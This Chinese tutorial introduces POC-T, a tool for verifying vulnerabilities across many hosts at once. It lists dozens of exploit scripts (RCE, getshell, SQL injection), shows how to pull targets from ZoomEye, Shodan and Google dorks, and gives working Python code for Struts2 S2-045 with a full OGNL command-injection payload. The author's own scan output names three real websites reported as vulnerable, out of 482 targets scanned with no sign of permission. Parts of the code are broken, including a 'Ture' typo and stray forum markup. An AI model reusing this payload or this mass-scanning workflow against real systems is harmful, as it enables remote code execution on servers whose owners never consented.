POC-T神器介绍
批量验证要解决的三个关键点:
数据:数据怎么来?
处理:逻辑是什么?
并发:如何实现?
安装过程:
git clone [url]https://github.com/Xyntax/POC-T[/url]
pip install -r requirement.txt
python POC-T.py数据:
数据来源很丰富,也很贴心。包括单个目标(-iS)、文件导入(-iF)、搜索引擎接口,包括谷歌(-aG)、Zoomeye(-aZ)、撒旦(-aS),这些接口的key设置支持运行时手动输入,也支持预先设置,在根目录下的toolkit.conf中设置,谷歌还支持代理,以便扶墙,是不是很贴心,参数–limit来限制搜索数目。其他来源参考帮助。
处理逻辑:
逻辑验证也就是poc,在script已经有很多作者维护的poc脚本,可以利用参数–show来列出poc脚本名
E:\工具管理\漏洞利用\POC-T-2.0>POC-T.py --show
[*] Script Name (total:53)
activemq-upload
activemq-weakpass
bingc
brute-example
cdn-detect
confluence-traversal
fastcgi-rce
fiyo2.0.7-getshell
glassfish-traversal
jboss-rce
jetspeed-rest-unauth
joomla-registrationpro-sqli
joomla-videoflow-sqli
joomla-videogallerylite-sqli
kubernetes-unauth
maccms8-rce
memcached-unauth
metinfo-504-sqli
mongodb-unauth
navis-webaccess-sqli
opensshd-user-enum
phpcms9.6.0-getshell
phpcms9.6.0-sqli
phpmyadmin-auth-rce
redis-cron-getshell
redis-sshkey-getshell
redis-unauth
redis-web-probe
resin-doc-traversal
rsync-weakpass
samsoftech-admin-bypass
shiro-deserial-rce
siemens-camera-getpwd
solr-unauth
spider-example
struts2-devmode
struts2-s2032
struts2-s2045
test
vbulletin-ssrf
vote-example
weblogic-ssrf-netmap
weblogic-wls
wp-4.4-ssrf
wp-4.7-userinfo
wp-4.7.1-restapi
wp-bonkersbeat-filedownload
wp-forcedownload
wp-ypo-filedownload
zabbix-jsrpc-mysql-exp
zabbix-jsrpc-sqli
zabbix-weakpass
zonetransfer并发实现:
并发的实现作者自己的框架,我们作为使用者不必太纠结原理,只要知道支持多线程(-eT)Gevent(-eG)两种并发模式就可以了。POC-T的效率非常之高,根据笔者测试,设置线程为30(默认10),测试2000+个目标不到3分钟就可以完成。
最后的命令格式大概是这样子
Python POC-T.py –s poc –aZ “port:22” –limit 100
Python POC-T.py –s poc –aG “url:index.php” –limit 100 –gproxy “socket5 127.0.0.1 1080”
Python POC-T.py –s poc –iS http://host//login.php?id=1
Python POC-T.py –s poc –iF /root/pentest/vul.txtPOC脚本编写:
为什么说POC-T很轻便呢,我认为就体现在poc脚本编写上,所有的验证只需要一个poc()函数就可以,成功就返回True或者自定义信息,失败就返回False,除此之外没有任何限制。没有实例,一切文章都是纸老虎。下面我们就以前段时间火爆的struts2-s045漏洞为例,详细说下poc的编写,在script目录下有个test.py就是poc脚本的一个demo,就在这个基础上编写我们的poc。
网上爆出的验证代码为
def poc(url):
register_openers()
datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})
header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
header["Content-Type"]="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo nMask').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
request = urllib2.Request(url,datagen,headers=header)
response = urllib2.urlopen(request)
body=response.read()
return body
这段代码,大概意思就是执行了“echo nMask”,也就是说返回的body中如果有字符串nMask就意味着漏洞存在,否则不存在。那么我们的poc代码就可以这么写
import urllib2[/size][/font]
[align=left][font=宋体][size=3]from poster.encode import multipart_encode
from poster.streaminghttp import register_openers
def poc(url):
register_openers()
datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})
header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
header["Content-Type"]="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo nMask || whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
try:
request = urllib2.Request(url,datagen,headers=header)
response = urllib2.urlopen(request,timeout=5)
body = response.readlines()[0:2]
except:
return False
if "nMask" in body:
return Ture
else:
return False
建议在脚本中处理Exception,如果线程运行中发现Exception,将使框架终止全部任务并打印错误信息。由于网络请求中经常出现连接中断等错误,一种简单的做法是:
def poc(input_str)
try:
...全部脚本逻辑...
except:
return False插件:
C:\Users\49974>cd E:\工具管理\漏洞利用\POC-T-2.0
C:\Users\49974>e:
E:\工具管理\漏洞利用\POC-T-2.0>pip install -r requirement.txt
Requirement already satisfied: requests in c:\python27\lib\site-packages (from -r requirement.txt (line 1))
Collecting gevent (from -r requirement.txt (line 2))
Downloading gevent-1.2.2-cp27-cp27m-win_amd64.whl (637kB)
100% |████████████████████████████████| 645kB 48kB/s
Collecting shodan (from -r requirement.txt (line 3))
Downloading shodan-1.7.7.tar.gz (42kB)
100% |████████████████████████████████| 51kB 81kB/s
Collecting google-api-python-client (from -r requirement.txt (line 4))
Downloading google_api_python_client-1.6.5-py2.py3-none-any.whl (53kB)
100% |████████████████████████████████| 61kB 67kB/s
Collecting greenlet>=0.4.10 (from gevent->-r requirement.txt (line 2))
Downloading greenlet-0.4.13-cp27-cp27m-win_amd64.whl
Requirement already satisfied: click in c:\python27\lib\site-packages (from shodan->-r requirement.txt (line 3))
Collecting click-plugins (from shodan->-r requirement.txt (line 3))
Downloading click-plugins-1.0.3.tar.gz
Collecting colorama (from shodan->-r requirement.txt (line 3))
Downloading colorama-0.3.9-py2.py3-none-any.whl
Collecting XlsxWriter (from shodan->-r requirement.txt (line 3))
Downloading XlsxWriter-1.0.2-py2.py3-none-any.whl (139kB)
100% |████████████████████████████████| 143kB 44kB/s
Requirement already satisfied: six<2dev,>=1.6.1 in c:\python27\lib\site-packages (from google-api-python-client->-r requirement.txt (line 4))
Collecting uritemplate<4dev,>=3.0.0 (from google-api-python-client->-r requirement.txt (line 4))
Downloading uritemplate-3.0.0-py2.py3-none-any.whl
Collecting oauth2client<5.0.0dev,>=1.5.0 (from google-api-python-client->-r requirement.txt (line 4))
Downloading oauth2client-4.1.2-py2.py3-none-any.whl (99kB)
100% |████████████████████████████████| 102kB 98kB/s
Collecting httplib2<1dev,>=0.9.2 (from google-api-python-client->-r requirement.txt (line 4))
Downloading httplib2-0.11.0.tar.gz (216kB)
100% |████████████████████████████████| 225kB 32kB/s
Collecting rsa>=3.1.4 (from oauth2client<5.0.0dev,>=1.5.0->google-api-python-client->-r requirement.txt (line 4))
Downloading rsa-3.4.2-py2.py3-none-any.whl (46kB)
100% |████████████████████████████████| 51kB 19kB/s
Requirement already satisfied: pyasn1-modules>=0.0.5 in c:\python27\lib\site-packages (from oauth2client<5.0.0dev,>=1.5.0->google-api-python-client->-r requirement.txt (line 4))
Requirement already satisfied: pyasn1>=0.1.7 in c:\python27\lib\site-packages (from oauth2client<5.0.0dev,>=1.5.0->google-api-python-client->-r requirement.txt (line 4))
Installing collected packages: greenlet, gevent, click-plugins, colorama, XlsxWriter, shodan, uritemplate, rsa, httplib2, oauth2client, google-api-python-client
Running setup.py install for click-plugins ... done
Running setup.py install for shodan ... done
Running setup.py install for httplib2 ... done
Successfully installed XlsxWriter-1.0.2 click-plugins-1.0.3 colorama-0.3.9 gevent-1.2.2 google-api-python-client-1.6.5 greenlet-0.4.13 httplib2-0.11.0 oauth2client-4.1.2 rsa-3.4.2 shodan-1.7.7 uritemplate-3.0.0
E:\工具管理\漏洞利用\POC-T-2.0>POC-T.py -h
usage: python POC-T.py -s bingc -aZ "port:8080"
powered by cdxy <mail:i@cdxy.me>
ENGINE:
-eT Multi-Threaded engine (default choice)
-eG Gevent engine (single-threaded with asynchronous)
-t NUM num of threads/concurrent, 10 by default
SCRIPT:
-s NAME load script by name (-s jboss-rce) or path (-s
./script/jboss.py)
TARGET:
-iS TARGET scan a single target (e.g. www.wooyun.org)
-iF FILE load targets from targetFile (e.g.
./data/wooyun_domain)
-iA START-END generate array from int(start) to int(end) (e.g.
1-100)
-iN IP/MASK generate IP from IP/MASK. (e.g. 127.0.0.0/24)
API:
-aZ DORK, --zoomeye DORK
ZoomEye dork (e.g. "zabbix port:8080")
-aS DORK, --shodan DORK
Shodan dork.
-aG DORK, --google DORK
Google dork (e.g. "inurl:admin.php")
-aF DORK, --fofa DORK
FoFa dork (e.g. "banner=users && protocol=ftp")
--limit NUM Maximum searching results (default:10)
--offset OFFSET Search offset to begin getting results from
(default:0)
--search-type TYPE [ZoomEye] search type used in ZoomEye API, web or host
(default:host)
--gproxy PROXY [Google] Use proxy for Google (e.g. "sock5 127.0.0.1
7070" or "http 127.0.0.1 1894"
OUTPUT:
-o FILE output file path&name. default in ./output/
-oF, --no-file disable file output
-oS, --no-screen disable screen output
MISC:
--single exit after finding the first victim/password.
--show show available script names in ./script/ and exit
--browser Open notepad or web browser to view report after task
finished.
SYSTEM:
-v, --version show program's version number and exit
-h, --help show this help message and exit
--update update POC-T from github source
E:\工具管理\漏洞利用\POC-T-2.0>POC-T.py --show
[*] Script Name (total:53)
activemq-upload
activemq-weakpass
bingc
brute-example
cdn-detect
confluence-traversal
fastcgi-rce
fiyo2.0.7-getshell
glassfish-traversal
jboss-rce
jetspeed-rest-unauth
joomla-registrationpro-sqli
joomla-videoflow-sqli
joomla-videogallerylite-sqli
kubernetes-unauth
maccms8-rce
memcached-unauth
metinfo-504-sqli
mongodb-unauth
navis-webaccess-sqli
opensshd-user-enum
phpcms9.6.0-getshell
phpcms9.6.0-sqli
phpmyadmin-auth-rce
redis-cron-getshell
redis-sshkey-getshell
redis-unauth
redis-web-probe
resin-doc-traversal
rsync-weakpass
samsoftech-admin-bypass
shiro-deserial-rce
siemens-camera-getpwd
solr-unauth
spider-example
struts2-devmode
struts2-s2032
struts2-s2045
test
vbulletin-ssrf
vote-example
weblogic-ssrf-netmap
weblogic-wls
wp-4.4-ssrf
wp-4.7-userinfo
wp-4.7.1-restapi
wp-bonkersbeat-filedownload
wp-forcedownload
wp-ypo-filedownload
zabbix-jsrpc-mysql-exp
zabbix-jsrpc-sqli
zabbix-weakpass
zonetransfer
E:\工具管理\漏洞利用\POC-T-2.0>POC-T.py -s struts2-s2045 -iF C:\Users\49974\Desktop\st2.txt
__/
____ ____ _____ ______/ __/
/ __ \ / __ \ / ___/ ____ /__ __/_/
/ /_/ / / /_/ / / /___ /___/ / /
/ /___/ \____/ \____/ / /
/_/ /_/
{ Version 2.0.5 by cdxy mail:i@cdxy.me }
[+] Load custom script: struts2-s2045.py
[+] Initialize targets...
[+] Total: 482
[+] Set the number of concurrent: 10
[S2-045]http://www.m56.cn/login.action
[S2-045]http://oa-sms.com/login.login.action
[S2-045]http://wzxt.zdwlcloud.com/Login.action
3 found | 0 remaining | 482 scanned in 83.58 seconds
[*] System exit.
E:\工具管理\漏洞利用\POC-T-2.0>同时struts2-045漏洞测出了两种结果,经过测试poc-t出来的结果较为准确
其他功能:
如果我们搞明白了批量需要解决的那三个关键问题,就会发现这个框架不仅可以用作poc批量验证,还可以用作它途,只要原理一样就可以。比如爆破、爬虫、采集等。作者也给出了相应实例
后续研究:
使用
poc-t.py --batch -iF 1.txt使用fuzz脚本poc-t.py -eT -t 20 -s xx -iF 1w.txt
插件
- waf 检测waf 并返回没有waf的url
- craw 爬取链接中的相关地址
- vulscan 检测sql注入漏洞
- portscan 端口扫描,检测弱口令服务
其他优秀的poc批量验证工具:
Pocsuite: https://github.com/knownsec/Pocsuite
Pentestdb: https://github.com/alpha1e0/pentestdb
s0m3poc: https://github.com/s0m30ne/s0m3poc
3025
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
